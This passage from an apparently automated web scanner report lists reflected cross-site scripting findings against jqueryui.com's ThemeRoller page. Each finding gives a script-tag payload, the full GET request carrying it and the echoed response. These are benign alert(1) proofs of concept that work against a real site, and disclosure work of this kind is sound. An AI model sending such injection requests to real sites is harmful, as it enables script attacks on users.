8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a6d63a"><script>alert(1)</script>02028214c2d&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.154. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5a"><script>alert(1)</script>8b223fd84ef was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223af5a"><script>alert(1)</script>8b223fd84ef&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223af5a"><script>alert(1)</script>8b223fd84ef&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

1.155. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31ec"><script>alert(1)</script>eba326948fc was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636d31ec"><script>alert(1)</script>eba326948fc&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636d31ec"><script>alert(1)</script>eba326948fc&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

1.156. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea519"><script>alert(1)</script>df022702129 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121ea519"><script>alert(1)</script>df022702129&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121ea519"><script>alert(1)</script>df022702129&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

1.157. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c7de"><script>alert(1)</script>abcacab3b7 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif5c7de"><script>alert(1)</script>abcacab3b7&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif5c7de"><script>alert(1)</script>abcacab3b7&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

1.158. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2541b"><script>alert(1)</script>dff14ea4a89 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em2541b"><script>alert(1)</script>dff14ea4a89&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em2541b"><script>alert(1)</script>dff14ea4a89&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

1.159. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2996"><script>alert(1)</script>4dcec26e9e5 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc2996"><script>alert(1)</script>4dcec26e9e5&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc2996"><script>alert(1)</script>4dcec26e9e5&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

1.160. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5033f"><script>alert(1)</script>6745da73ba4 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545455033f"><script>alert(1)</script>6745da73ba4&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545455033f"><script>alert(1)</script>6745da73ba4&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

1.161. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3286f"><script>alert(1)</script>e150ae30ee5 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222223286f"><script>alert(1)</script>e150ae30ee5&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222223286f"><script>alert(1)</script>e150ae30ee5&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

1.162. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1510"><script>alert(1)</script>7ec6fc417d4 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888e1510"><script>alert(1)</script>7ec6fc417d4&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888e1510"><script>alert(1)</script>7ec6fc417d4&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

1.163. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

